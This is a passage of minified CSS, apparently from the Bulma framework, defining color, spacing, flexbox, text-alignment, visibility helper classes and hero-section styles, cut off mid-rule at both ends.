feecf0!important}.has-text-danger-dark{color:#cc0f35!important}a.has-text-danger-dark:hover,a.has-text-danger-dark:focus{color:#ee2049!important}.has-background-danger-dark{background-color:#cc0f35!important}.has-text-black-bis{color:#121212!important}.has-background-black-bis{background-color:#121212!important}.has-text-black-ter{color:#242424!important}.has-background-black-ter{background-color:#242424!important}.has-text-grey-darker{color:#363636!important}.has-background-grey-darker{background-color:#363636!important}.has-text-grey-dark{color:#4a4a4a!important}.has-background-grey-dark{background-color:#4a4a4a!important}.has-text-grey{color:#7a7a7a!important}.has-background-grey{background-color:#7a7a7a!important}.has-text-grey-light{color:#b5b5b5!important}.has-background-grey-light{background-color:#b5b5b5!important}.has-text-grey-lighter{color:#dbdbdb!important}.has-background-grey-lighter{background-color:#dbdbdb!important}.has-text-white-ter{color:#f5f5f5!important}.has-background-white-ter{background-color:#f5f5f5!important}.has-text-white-bis{color:#fafafa!important}.has-background-white-bis{background-color:#fafafa!important}.is-flex-direction-row{flex-direction:row!important}.is-flex-direction-row-reverse{flex-direction:row-reverse!important}.is-flex-direction-column{flex-direction:column!important}.is-flex-direction-column-reverse{flex-direction:column-reverse!important}.is-flex-wrap-nowrap{flex-wrap:nowrap!important}.is-flex-wrap-wrap{flex-wrap:wrap!important}.is-flex-wrap-wrap-reverse{flex-wrap:wrap-reverse!important}.is-justify-content-flex-start{justify-content:flex-start!important}.is-justify-content-flex-end{justify-content:flex-end!important}.is-justify-content-center{justify-content:center!important}.is-justify-content-space-between{justify-content:space-between!important}.is-justify-content-space-around{justify-content:space-around!important}.is-justify-content-space-evenly{justify-content:space-evenly!important}.is-justify-content-start{justify-content:start!important}.is-justify-content-end{justify-content:end!important}.is-justify-content-left{justify-content:left!important}.is-justify-content-right{justify-content:right!important}.is-align-content-flex-start{align-content:flex-start!important}.is-align-content-flex-end{align-content:flex-end!important}.is-align-content-center{align-content:center!important}.is-align-content-space-between{align-content:space-between!important}.is-align-content-space-around{align-content:space-around!important}.is-align-content-space-evenly{align-content:space-evenly!important}.is-align-content-stretch{align-content:stretch!important}.is-align-content-start{align-content:start!important}.is-align-content-end{align-content:end!important}.is-align-content-baseline{align-content:baseline!important}.is-align-items-stretch{align-items:stretch!important}.is-align-items-flex-start{align-items:flex-start!important}.is-align-items-flex-end{align-items:flex-end!important}.is-align-items-center{align-items:center!important}.is-align-items-baseline{align-items:baseline!important}.is-align-items-start{align-items:start!important}.is-align-items-end{align-items:end!important}.is-align-items-self-start{align-items:self-start!important}.is-align-items-self-end{align-items:self-end!important}.is-align-self-auto{align-self:auto!important}.is-align-self-flex-start{align-self:flex-start!important}.is-align-self-flex-end{align-self:flex-end!important}.is-align-self-center{align-self:center!important}.is-align-self-baseline{align-self:baseline!important}.is-align-self-stretch{align-self:stretch!important}.is-flex-grow-0{flex-grow:0!important}.is-flex-grow-1{flex-grow:1!important}.is-flex-grow-2{flex-grow:2!important}.is-flex-grow-3{flex-grow:3!important}.is-flex-grow-4{flex-grow:4!important}.is-flex-grow-5{flex-grow:5!important}.is-flex-shrink-0{flex-shrink:0!important}.is-flex-shrink-1{flex-shrink:1!important}.is-flex-shrink-2{flex-shrink:2!important}.is-flex-shrink-3{flex-shrink:3!important}.is-flex-shrink-4{flex-shrink:4!important}.is-flex-shrink-5{flex-shrink:5!important}.is-clearfix:after{clear:both;content:" ";display:table}.is-pulled-left{float:left!important}.is-pulled-right{float:right!important}.is-radiusless{border-radius:0!important}.is-shadowless{box-shadow:none!important}.is-clickable{cursor:pointer!important;pointer-events:all!important}.is-clipped{overflow:hidden!important}.is-relative{position:relative!important}.is-marginless{margin:0!important}.is-paddingless{padding:0!important}.m-0{margin:0!important}.mt-0{margin-top:0!important}.mr-0{margin-right:0!important}.mb-0{margin-bottom:0!important}.ml-0{margin-left:0!important}.mx-0{margin-left:0!important;margin-right:0!important}.my-0{margin-top:0!important;margin-bottom:0!important}.m-1{margin:.25rem!important}.mt-1{margin-top:.25rem!important}.mr-1{margin-right:.25rem!important}.mb-1{margin-bottom:.25rem!important}.ml-1{margin-left:.25rem!important}.mx-1{margin-left:.25rem!important;margin-right:.25rem!important}.my-1{margin-top:.25rem!important;margin-bottom:.25rem!important}.m-2{margin:.5rem!important}.mt-2{margin-top:.5rem!important}.mr-2{margin-right:.5rem!important}.mb-2{margin-bottom:.5rem!important}.ml-2{margin-left:.5rem!important}.mx-2{margin-left:.5rem!important;margin-right:.5rem!important}.my-2{margin-top:.5rem!important;margin-bottom:.5rem!important}.m-3{margin:.75rem!important}.mt-3{margin-top:.75rem!important}.mr-3{margin-right:.75rem!important}.mb-3{margin-bottom:.75rem!important}.ml-3{margin-left:.75rem!important}.mx-3{margin-left:.75rem!important;margin-right:.75rem!important}.my-3{margin-top:.75rem!important;margin-bottom:.75rem!important}.m-4{margin:1rem!important}.mt-4{margin-top:1rem!important}.mr-4{margin-right:1rem!important}.mb-4{margin-bottom:1rem!important}.ml-4{margin-left:1rem!important}.mx-4{margin-left:1rem!important;margin-right:1rem!important}.my-4{margin-top:1rem!important;margin-bottom:1rem!important}.m-5{margin:1.5rem!important}.mt-5{margin-top:1.5rem!important}.mr-5{margin-right:1.5rem!important}.mb-5{margin-bottom:1.5rem!important}.ml-5{margin-left:1.5rem!important}.mx-5{margin-left:1.5rem!important;margin-right:1.5rem!important}.my-5{margin-top:1.5rem!important;margin-bottom:1.5rem!important}.m-6{margin:3rem!important}.mt-6{margin-top:3rem!important}.mr-6{margin-right:3rem!important}.mb-6{margin-bottom:3rem!important}.ml-6{margin-left:3rem!important}.mx-6{margin-left:3rem!important;margin-right:3rem!important}.my-6{margin-top:3rem!important;margin-bottom:3rem!important}.m-auto{margin:auto!important}.mt-auto{margin-top:auto!important}.mr-auto{margin-right:auto!important}.mb-auto{margin-bottom:auto!important}.ml-auto{margin-left:auto!important}.mx-auto{margin-left:auto!important;margin-right:auto!important}.my-auto{margin-top:auto!important;margin-bottom:auto!important}.p-0{padding:0!important}.pt-0{padding-top:0!important}.pr-0{padding-right:0!important}.pb-0{padding-bottom:0!important}.pl-0{padding-left:0!important}.px-0{padding-left:0!important;padding-right:0!important}.py-0{padding-top:0!important;padding-bottom:0!important}.p-1{padding:.25rem!important}.pt-1{padding-top:.25rem!important}.pr-1{padding-right:.25rem!important}.pb-1{padding-bottom:.25rem!important}.pl-1{padding-left:.25rem!important}.px-1{padding-left:.25rem!important;padding-right:.25rem!important}.py-1{padding-top:.25rem!important;padding-bottom:.25rem!important}.p-2{padding:.5rem!important}.pt-2{padding-top:.5rem!important}.pr-2{padding-right:.5rem!important}.pb-2{padding-bottom:.5rem!important}.pl-2{padding-left:.5rem!important}.px-2{padding-left:.5rem!important;padding-right:.5rem!important}.py-2{padding-top:.5rem!important;padding-bottom:.5rem!important}.p-3{padding:.75rem!important}.pt-3{padding-top:.75rem!important}.pr-3{padding-right:.75rem!important}.pb-3{padding-bottom:.75rem!important}.pl-3{padding-left:.75rem!important}.px-3{padding-left:.75rem!important;padding-right:.75rem!important}.py-3{padding-top:.75rem!important;padding-bottom:.75rem!important}.p-4{padding:1rem!important}.pt-4{padding-top:1rem!important}.pr-4{padding-right:1rem!important}.pb-4{padding-bottom:1rem!important}.pl-4{padding-left:1rem!important}.px-4{padding-left:1rem!important;padding-right:1rem!important}.py-4{padding-top:1rem!important;padding-bottom:1rem!important}.p-5{padding:1.5rem!important}.pt-5{padding-top:1.5rem!important}.pr-5{padding-right:1.5rem!important}.pb-5{padding-bottom:1.5rem!important}.pl-5{padding-left:1.5rem!important}.px-5{padding-left:1.5rem!important;padding-right:1.5rem!important}.py-5{padding-top:1.5rem!important;padding-bottom:1.5rem!important}.p-6{padding:3rem!important}.pt-6{padding-top:3rem!important}.pr-6{padding-right:3rem!important}.pb-6{padding-bottom:3rem!important}.pl-6{padding-left:3rem!important}.px-6{padding-left:3rem!important;padding-right:3rem!important}.py-6{padding-top:3rem!important;padding-bottom:3rem!important}.p-auto{padding:auto!important}.pt-auto{padding-top:auto!important}.pr-auto{padding-right:auto!important}.pb-auto{padding-bottom:auto!important}.pl-auto{padding-left:auto!important}.px-auto{padding-left:auto!important;padding-right:auto!important}.py-auto{padding-top:auto!important;padding-bottom:auto!important}.is-size-1{font-size:3rem!important}.is-size-2{font-size:2.5rem!important}.is-size-3{font-size:2rem!important}.is-size-4{font-size:1.5rem!important}.is-size-5{font-size:1.25rem!important}.is-size-6{font-size:1rem!important}.is-size-7{font-size:.75rem!important}@media screen and (max-width: 768px){.is-size-1-mobile{font-size:3rem!important}.is-size-2-mobile{font-size:2.5rem!important}.is-size-3-mobile{font-size:2rem!important}.is-size-4-mobile{font-size:1.5rem!important}.is-size-5-mobile{font-size:1.25rem!important}.is-size-6-mobile{font-size:1rem!important}.is-size-7-mobile{font-size:.75rem!important}}@media screen and (min-width: 769px),print{.is-size-1-tablet{font-size:3rem!important}.is-size-2-tablet{font-size:2.5rem!important}.is-size-3-tablet{font-size:2rem!important}.is-size-4-tablet{font-size:1.5rem!important}.is-size-5-tablet{font-size:1.25rem!important}.is-size-6-tablet{font-size:1rem!important}.is-size-7-tablet{font-size:.75rem!important}}@media screen and (max-width: 1023px){.is-size-1-touch{font-size:3rem!important}.is-size-2-touch{font-size:2.5rem!important}.is-size-3-touch{font-size:2rem!important}.is-size-4-touch{font-size:1.5rem!important}.is-size-5-touch{font-size:1.25rem!important}.is-size-6-touch{font-size:1rem!important}.is-size-7-touch{font-size:.75rem!important}}@media screen and (min-width: 1024px){.is-size-1-desktop{font-size:3rem!important}.is-size-2-desktop{font-size:2.5rem!important}.is-size-3-desktop{font-size:2rem!important}.is-size-4-desktop{font-size:1.5rem!important}.is-size-5-desktop{font-size:1.25rem!important}.is-size-6-desktop{font-size:1rem!important}.is-size-7-desktop{font-size:.75rem!important}}@media screen and (min-width: 1216px){.is-size-1-widescreen{font-size:3rem!important}.is-size-2-widescreen{font-size:2.5rem!important}.is-size-3-widescreen{font-size:2rem!important}.is-size-4-widescreen{font-size:1.5rem!important}.is-size-5-widescreen{font-size:1.25rem!important}.is-size-6-widescreen{font-size:1rem!important}.is-size-7-widescreen{font-size:.75rem!important}}@media screen and (min-width: 1408px){.is-size-1-fullhd{font-size:3rem!important}.is-size-2-fullhd{font-size:2.5rem!important}.is-size-3-fullhd{font-size:2rem!important}.is-size-4-fullhd{font-size:1.5rem!important}.is-size-5-fullhd{font-size:1.25rem!important}.is-size-6-fullhd{font-size:1rem!important}.is-size-7-fullhd{font-size:.75rem!important}}.has-text-centered{text-align:center!important}.has-text-justified{text-align:justify!important}.has-text-left{text-align:left!important}.has-text-right{text-align:right!important}@media screen and (max-width: 768px){.has-text-centered-mobile{text-align:center!important}}@media screen and (min-width: 769px),print{.has-text-centered-tablet{text-align:center!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-centered-tablet-only{text-align:center!important}}@media screen and (max-width: 1023px){.has-text-centered-touch{text-align:center!important}}@media screen and (min-width: 1024px){.has-text-centered-desktop{text-align:center!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-centered-desktop-only{text-align:center!important}}@media screen and (min-width: 1216px){.has-text-centered-widescreen{text-align:center!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-centered-widescreen-only{text-align:center!important}}@media screen and (min-width: 1408px){.has-text-centered-fullhd{text-align:center!important}}@media screen and (max-width: 768px){.has-text-justified-mobile{text-align:justify!important}}@media screen and (min-width: 769px),print{.has-text-justified-tablet{text-align:justify!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-justified-tablet-only{text-align:justify!important}}@media screen and (max-width: 1023px){.has-text-justified-touch{text-align:justify!important}}@media screen and (min-width: 1024px){.has-text-justified-desktop{text-align:justify!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-justified-desktop-only{text-align:justify!important}}@media screen and (min-width: 1216px){.has-text-justified-widescreen{text-align:justify!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-justified-widescreen-only{text-align:justify!important}}@media screen and (min-width: 1408px){.has-text-justified-fullhd{text-align:justify!important}}@media screen and (max-width: 768px){.has-text-left-mobile{text-align:left!important}}@media screen and (min-width: 769px),print{.has-text-left-tablet{text-align:left!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-left-tablet-only{text-align:left!important}}@media screen and (max-width: 1023px){.has-text-left-touch{text-align:left!important}}@media screen and (min-width: 1024px){.has-text-left-desktop{text-align:left!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-left-desktop-only{text-align:left!important}}@media screen and (min-width: 1216px){.has-text-left-widescreen{text-align:left!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-left-widescreen-only{text-align:left!important}}@media screen and (min-width: 1408px){.has-text-left-fullhd{text-align:left!important}}@media screen and (max-width: 768px){.has-text-right-mobile{text-align:right!important}}@media screen and (min-width: 769px),print{.has-text-right-tablet{text-align:right!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.has-text-right-tablet-only{text-align:right!important}}@media screen and (max-width: 1023px){.has-text-right-touch{text-align:right!important}}@media screen and (min-width: 1024px){.has-text-right-desktop{text-align:right!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.has-text-right-desktop-only{text-align:right!important}}@media screen and (min-width: 1216px){.has-text-right-widescreen{text-align:right!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.has-text-right-widescreen-only{text-align:right!important}}@media screen and (min-width: 1408px){.has-text-right-fullhd{text-align:right!important}}.is-capitalized{text-transform:capitalize!important}.is-lowercase{text-transform:lowercase!important}.is-uppercase{text-transform:uppercase!important}.is-italic{font-style:italic!important}.is-underlined{text-decoration:underline!important}.has-text-weight-light{font-weight:300!important}.has-text-weight-normal{font-weight:400!important}.has-text-weight-medium{font-weight:500!important}.has-text-weight-semibold{font-weight:600!important}.has-text-weight-bold{font-weight:700!important}.is-family-primary,.is-family-secondary,.is-family-sans-serif{font-family:BlinkMacSystemFont,-apple-system,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,Helvetica,Arial,sans-serif!important}.is-family-monospace,.is-family-code{font-family:monospace!important}.is-block{display:block!important}@media screen and (max-width: 768px){.is-block-mobile{display:block!important}}@media screen and (min-width: 769px),print{.is-block-tablet{display:block!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-block-tablet-only{display:block!important}}@media screen and (max-width: 1023px){.is-block-touch{display:block!important}}@media screen and (min-width: 1024px){.is-block-desktop{display:block!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-block-desktop-only{display:block!important}}@media screen and (min-width: 1216px){.is-block-widescreen{display:block!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-block-widescreen-only{display:block!important}}@media screen and (min-width: 1408px){.is-block-fullhd{display:block!important}}.is-flex{display:flex!important}@media screen and (max-width: 768px){.is-flex-mobile{display:flex!important}}@media screen and (min-width: 769px),print{.is-flex-tablet{display:flex!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-flex-tablet-only{display:flex!important}}@media screen and (max-width: 1023px){.is-flex-touch{display:flex!important}}@media screen and (min-width: 1024px){.is-flex-desktop{display:flex!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-flex-desktop-only{display:flex!important}}@media screen and (min-width: 1216px){.is-flex-widescreen{display:flex!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-flex-widescreen-only{display:flex!important}}@media screen and (min-width: 1408px){.is-flex-fullhd{display:flex!important}}.is-inline{display:inline!important}@media screen and (max-width: 768px){.is-inline-mobile{display:inline!important}}@media screen and (min-width: 769px),print{.is-inline-tablet{display:inline!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-inline-tablet-only{display:inline!important}}@media screen and (max-width: 1023px){.is-inline-touch{display:inline!important}}@media screen and (min-width: 1024px){.is-inline-desktop{display:inline!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-inline-desktop-only{display:inline!important}}@media screen and (min-width: 1216px){.is-inline-widescreen{display:inline!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-inline-widescreen-only{display:inline!important}}@media screen and (min-width: 1408px){.is-inline-fullhd{display:inline!important}}.is-inline-block{display:inline-block!important}@media screen and (max-width: 768px){.is-inline-block-mobile{display:inline-block!important}}@media screen and (min-width: 769px),print{.is-inline-block-tablet{display:inline-block!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-inline-block-tablet-only{display:inline-block!important}}@media screen and (max-width: 1023px){.is-inline-block-touch{display:inline-block!important}}@media screen and (min-width: 1024px){.is-inline-block-desktop{display:inline-block!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-inline-block-desktop-only{display:inline-block!important}}@media screen and (min-width: 1216px){.is-inline-block-widescreen{display:inline-block!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-inline-block-widescreen-only{display:inline-block!important}}@media screen and (min-width: 1408px){.is-inline-block-fullhd{display:inline-block!important}}.is-inline-flex{display:inline-flex!important}@media screen and (max-width: 768px){.is-inline-flex-mobile{display:inline-flex!important}}@media screen and (min-width: 769px),print{.is-inline-flex-tablet{display:inline-flex!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-inline-flex-tablet-only{display:inline-flex!important}}@media screen and (max-width: 1023px){.is-inline-flex-touch{display:inline-flex!important}}@media screen and (min-width: 1024px){.is-inline-flex-desktop{display:inline-flex!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-inline-flex-desktop-only{display:inline-flex!important}}@media screen and (min-width: 1216px){.is-inline-flex-widescreen{display:inline-flex!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-inline-flex-widescreen-only{display:inline-flex!important}}@media screen and (min-width: 1408px){.is-inline-flex-fullhd{display:inline-flex!important}}.is-hidden{display:none!important}.is-sr-only{border:none!important;clip:rect(0,0,0,0)!important;height:.01em!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:.01em!important}@media screen and (max-width: 768px){.is-hidden-mobile{display:none!important}}@media screen and (min-width: 769px),print{.is-hidden-tablet{display:none!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-hidden-tablet-only{display:none!important}}@media screen and (max-width: 1023px){.is-hidden-touch{display:none!important}}@media screen and (min-width: 1024px){.is-hidden-desktop{display:none!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-hidden-desktop-only{display:none!important}}@media screen and (min-width: 1216px){.is-hidden-widescreen{display:none!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-hidden-widescreen-only{display:none!important}}@media screen and (min-width: 1408px){.is-hidden-fullhd{display:none!important}}.is-invisible{visibility:hidden!important}@media screen and (max-width: 768px){.is-invisible-mobile{visibility:hidden!important}}@media screen and (min-width: 769px),print{.is-invisible-tablet{visibility:hidden!important}}@media screen and (min-width: 769px) and (max-width: 1023px){.is-invisible-tablet-only{visibility:hidden!important}}@media screen and (max-width: 1023px){.is-invisible-touch{visibility:hidden!important}}@media screen and (min-width: 1024px){.is-invisible-desktop{visibility:hidden!important}}@media screen and (min-width: 1024px) and (max-width: 1215px){.is-invisible-desktop-only{visibility:hidden!important}}@media screen and (min-width: 1216px){.is-invisible-widescreen{visibility:hidden!important}}@media screen and (min-width: 1216px) and (max-width: 1407px){.is-invisible-widescreen-only{visibility:hidden!important}}@media screen and (min-width: 1408px){.is-invisible-fullhd{visibility:hidden!important}}.hero{align-items:stretch;display:flex;flex-direction:column;justify-content:space-between}.hero .navbar{background:none}.hero .tabs ul{border-bottom:none}.hero.is-white{background-color:#fff;color:#0a0a0a}.hero.is-white a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-white strong{color:inherit}.hero.is-white .title{color:#0a0a0a}.hero.is-white .subtitle{color:#0a0a0ae6}.hero.is-white .subtitle a:not(.button),.hero.is-white .subtitle strong{color:#0a0a0a}@media screen and (max-width: 1023px){.hero.is-white .navbar-menu{background-color:#fff}}.hero.is-white .navbar-item,.hero.is-white .navbar-link{color:#0a0a0ab3}.hero.is-white a.navbar-item:hover,.hero.is-white a.navbar-item.is-active,.hero.is-white .navbar-link:hover,.hero.is-white .navbar-link.is-active{background-color:#f2f2f2;color:#0a0a0a}.hero.is-white .tabs a{color:#0a0a0a;opacity:.9}.hero.is-white .tabs a:hover{opacity:1}.hero.is-white .tabs li.is-active a{color:#fff!important;opacity:1}.hero.is-white .tabs.is-boxed a,.hero.is-white .tabs.is-toggle a{color:#0a0a0a}.hero.is-white .tabs.is-boxed a:hover,.hero.is-white .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-white .tabs.is-boxed li.is-active a,.hero.is-white .tabs.is-boxed li.is-active a:hover,.hero.is-white .tabs.is-toggle li.is-active a,.hero.is-white .tabs.is-toggle li.is-active a:hover{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.hero.is-white.is-bold{background-image:linear-gradient(141deg,#e6e6e6 0%,white 71%,white 100%)}@media screen and (max-width: 768px){.hero.is-white.is-bold .navbar-menu{background-image:linear-gradient(141deg,#e6e6e6 0%,white 71%,white 100%)}}.hero.is-black{background-color:#0a0a0a;color:#fff}.hero.is-black a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-black strong{color:inherit}.hero.is-black .title{color:#fff}.hero.is-black .subtitle{color:#ffffffe6}.hero.is-black .subtitle a:not(.button),.hero.is-black .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-black .navbar-menu{background-color:#0a0a0a}}.hero.is-black .navbar-item,.hero.is-black .navbar-link{color:#ffffffb3}.hero.is-black a.navbar-item:hover,.hero.is-black a.navbar-item.is-active,.hero.is-black .navbar-link:hover,.hero.is-black .navbar-link.is-active{background-color:#000;color:#fff}.hero.is-black .tabs a{color:#fff;opacity:.9}.hero.is-black .tabs a:hover{opacity:1}.hero.is-black .tabs li.is-active a{color:#0a0a0a!important;opacity:1}.hero.is-black .tabs.is-boxed a,.hero.is-black .tabs.is-toggle a{color:#fff}.hero.is-black .tabs.is-boxed a:hover,.hero.is-black .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-black .tabs.is-boxed li.is-active a,.hero.is-black .tabs.is-boxed li.is-active a:hover,.hero.is-black .tabs.is-toggle li.is-active a,.hero.is-black .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#0a0a0a}.hero.is-black.is-bold{background-image:linear-gradient(141deg,black 0%,#0a0a0a 71%,#181616 100%)}@media screen and (max-width: 768px){.hero.is-black.is-bold .navbar-menu{background-image:linear-gradient(141deg,black 0%,#0a0a0a 71%,#181616 100%)}}.hero.is-light{background-color:#f5f5f5;color:#000000b3}.hero.is-light a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-light strong{color:inherit}.hero.is-light .title{color:#000000b3}.hero.is-light .subtitle{color:#000000e6}.hero.is-light .subtitle a:not(.button),.hero.is-light .subtitle strong{color:#000000b3}@media screen and (max-width: 1023px){.hero.is-light .navbar-menu{background-color:#f5f5f5}}.hero.is-light .navbar-item,.hero.is-light .navbar-link{color:#000000b3}.hero.is-light a.navbar-item:hover,.hero.is-light a.navbar-item.is-active,.hero.is-light .navbar-link:hover,.hero.is-light .navbar-link.is-active{background-color:#e8e8e8;color:#000000b3}.hero.is-light .tabs a{color:#000000b3;opacity:.9}.hero.is-light .tabs a:hover{opacity:1}.hero.is-light .tabs li.is-active a{color:#f5f5f5!important;opacity:1}.hero.is-light .tabs.is-boxed a,.hero.is-light .tabs.is-toggle a{color:#000000b3}.hero.is-light .tabs.is-boxed a:hover,.hero.is-light .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-light .tabs.is-boxed li.is-active a,.hero.is-light .tabs.is-boxed li.is-active a:hover,.hero.is-light .tabs.is-toggle li.is-active a,.hero.is-light .tabs.is-toggle li.is-active a:hover{background-color:#000000b3;border-color:#000000b3;color:#f5f5f5}.hero.is-light.is-bold{background-image:linear-gradient(141deg,#dfd8d9 0%,whitesmoke 71%,white 100%)}@media screen and (max-width: 768px){.hero.is-light.is-bold .navbar-menu{background-image:linear-gradient(141deg,#dfd8d9 0%,whitesmoke 71%,white 100%)}}.hero.is-dark{background-color:#363636;color:#fff}.hero.is-dark a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-dark strong{color:inherit}.hero.is-dark .title{color:#fff}.hero.is-dark .subtitle{color:#ffffffe6}.hero.is-dark .subtitle a:not(.button),.hero.is-dark .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-dark .navbar-menu{background-color:#363636}}.hero.is-dark .navbar-item,.hero.is-dark .navbar-link{color:#ffffffb3}.hero.is-dark a.navbar-item:hover,.hero.is-dark a.navbar-item.is-active,.hero.is-dark .navbar-link:hover,.hero.is-dark .navbar-link.is-active{background-color:#292929;color:#fff}.hero.is-dark .tabs a{color:#fff;opacity:.9}.hero.is-dark .tabs a:hover{opacity:1}.hero.is-dark .tabs li.is-active a{color:#363636!important;opacity:1}.hero.is-dark .tabs.is-boxed a,.hero.is-dark .tabs.is-toggle a{color:#fff}.hero.is-dark .tabs.is-boxed a:hover,.hero.is-dark .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-dark .tabs.is-boxed li.is-active a,.hero.is-dark .tabs.is-boxed li.is-active a:hover,.hero.is-dark .tabs.is-toggle li.is-active a,.hero.is-dark .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#363636}.hero.is-dark.is-bold{background-image:linear-gradient(141deg,#1f191a 0%,#363636 71%,#46403f 100%)}@media screen and (max-width: 768px){.hero.is-dark.is-bold .navbar-menu{background-image:linear-gradient(141deg,#1f191a 0%,#363636 71%,#46403f 100%)}}.hero.is-primary{background-color:#00d1b2;color:#fff}.hero.is-primary a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-primary strong{color:inherit}.hero.is-primary .title{color:#fff}.hero.is-primary .subtitle{color:#ffffffe6}.hero.is-primary .subtitle a:not(.button),.hero.is-primary .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-primary .navbar-menu{background-color:#00d1b2}}.hero.is-primary .navbar-item,.hero.is-primary .navbar-link{color:#ffffffb3}.hero.is-primary a.navbar-item:hover,.hero.is-primary a.navbar-item.is-active,.hero.is-primary .navbar-link:hover,.hero.is-primary .navbar-link.is-active{background-color:#00b89c;color:#fff}.hero.is-primary .tabs a{color:#fff;opacity:.9}.hero.is-primary .tabs a:hover{opacity:1}.hero.is-primary .tabs li.is-active a{color:#00d1b2!important;opacity:1}.hero.is-primary .tabs.is-boxed a,.hero.is-primary .tabs.is-toggle a{color:#fff}.hero.is-primary .tabs.is-boxed a:hover,.hero.is-primary .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-primary .tabs.is-boxed li.is-active a,.hero.is-primary .tabs.is-boxed li.is-active a:hover,.hero.is-primary .tabs.is-toggle li.is-active a,.hero.is-primary .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#00d1b2}.hero.is-primary.is-bold{background-image:linear-gradient(141deg,#009e6c 0%,#00d1b2 71%,#00e7eb 100%)}@media screen and (max-width: 768px){.hero.is-primary.is-bold .navbar-menu{background-image:linear-gradient(141deg,#009e6c 0%,#00d1b2 71%,#00e7eb 100%)}}.hero.is-link{background-color:#485fc7;color:#fff}.hero.is-link a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-link strong{color:inherit}.hero.is-link .title{color:#fff}.hero.is-link .subtitle{color:#ffffffe6}.hero.is-link .subtitle a:not(.button),.hero.is-link .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-link .navbar-menu{background-color:#485fc7}}.hero.is-link .navbar-item,.hero.is-link .navbar-link{color:#ffffffb3}.hero.is-link a.navbar-item:hover,.hero.is-link a.navbar-item.is-active,.hero.is-link .navbar-link:hover,.hero.is-link .navbar-link.is-active{background-color:#3a51bb;color:#fff}.hero.is-link .tabs a{color:#fff;opacity:.9}.hero.is-link .tabs a:hover{opacity:1}.hero.is-link .tabs li.is-active a{color:#485fc7!important;opacity:1}.hero.is-link .tabs.is-boxed a,.hero.is-link .tabs.is-toggle a{color:#fff}.hero.is-link .tabs.is-boxed a:hover,.hero.is-link .tabs.is-toggle a:hover{background-color:#0a0a0a1a}.hero.is-link .tabs.is-boxed li.is-active a,.hero.is-link .tabs.is-boxed li.is-active a:hover,.hero.is-link .tabs.is-toggle li.is-active a,.hero.is-link .tabs.is-toggle li.is-active a:hover{background-color:#fff;border-color:#fff;color:#485fc7}.hero.is-link.is-bold{background-image:linear-gradient(141deg,#2959b3 0%,#485fc7 71%,#5658d2 100%)}@media screen and (max-width: 768px){.hero.is-link.is-bold .navbar-menu{background-image:linear-gradient(141deg,#2959b3 0%,#485fc7 71%,#5658d2 100%)}}.hero.is-info{background-color:#3e8ed0;color:#fff}.hero.is-info a:not(.button):not(.dropdown-item):not(.tag):not(.pagination-link.is-current),.hero.is-info strong{color:inherit}.hero.is-info .title{color:#fff}.hero.is-info .subtitle{color:#ffffffe6}.hero.is-info .subtitle a:not(.button),.hero.is-info .subtitle strong{color:#fff}@media screen and (max-width: 1023px){.hero.is-info .navbar-menu{background-color:#3e8ed0}}.hero.is-info .navbar-item,.hero.is-info .navbar-link{color:#ffffffb3}.hero.is-info a.navbar-item:hover,.hero.is-info a.navbar-item.is-active,.hero.is-info .navbar-link:hover,.hero.is-info .navbar-link.is-active{background-color:#3082c5;color:#fff}.hero.is-info .tabs a{color:#fff;opacity:.9}.hero.is-info .tabs a:hover{opacity:1}.hero.is-info .tabs li.is-active 